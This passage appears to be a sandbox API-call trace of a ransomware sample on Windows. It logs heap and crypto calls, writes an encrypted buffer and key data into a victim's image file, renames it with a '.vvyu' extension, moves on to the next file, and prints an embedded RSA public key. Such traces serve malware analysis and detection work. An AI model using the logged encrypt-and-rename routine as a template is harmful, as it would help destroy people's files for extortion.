pdwDataLen=0x312fa54) returned 1 [0199.946] GetLastError () returned 0x0 [0199.946] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.946] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.947] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.947] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.947] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbf10) returned 0x2ea99b0 [0199.947] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f738 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f780 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.948] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3260 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.951] GetCurrentThreadId () returned 0x66c [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7b78 [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.952] GetCurrentThreadId () returned 0x66c [0199.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3290 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f780 | out: hHeap=0x620000) returned 1 [0199.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.964] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xbf06, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xbf06, lpOverlapped=0x0) returned 1 [0199.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0199.965] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xbf0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.965] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.967] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.967] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.967] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.968] CloseHandle (hObject=0x510) returned 1 [0199.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0199.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0199.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0199.970] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\LXhmd.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\lxhmd.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\LXhmd.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\lxhmd.gif.vvyu")) returned 1 [0199.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.971] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.974] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7320b0, ftCreationTime.dwHighDateTime=0x1d896e2, ftLastAccessTime.dwLowDateTime=0x89334340, ftLastAccessTime.dwHighDateTime=0x1d89db1, ftLastWriteTime.dwLowDateTime=0x89334340, ftLastWriteTime.dwHighDateTime=0x1d89db1, nFileSizeHigh=0x0, nFileSizeLow=0x7f38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uo7bfSHfyn-0X-MGd.bmp", cAlternateFileName="UO7BFS~1.BMP")) returned 1 [0199.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.975] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\uo7bfSHfyn-0X-MGd.bmp") returned=".bmp" [0199.975] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\uo7bfSHfyn-0X-MGd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\uo7bfshfyn-0x-mgd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.975] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=32568) returned 1 [0199.975] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.978] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x7f12, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.978] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.981] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.981] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x7f38, lpOverlapped=0x0) returned 1 [0199.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.982] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.982] lstrlenA (lpString="-----BEGIN PUBLIC 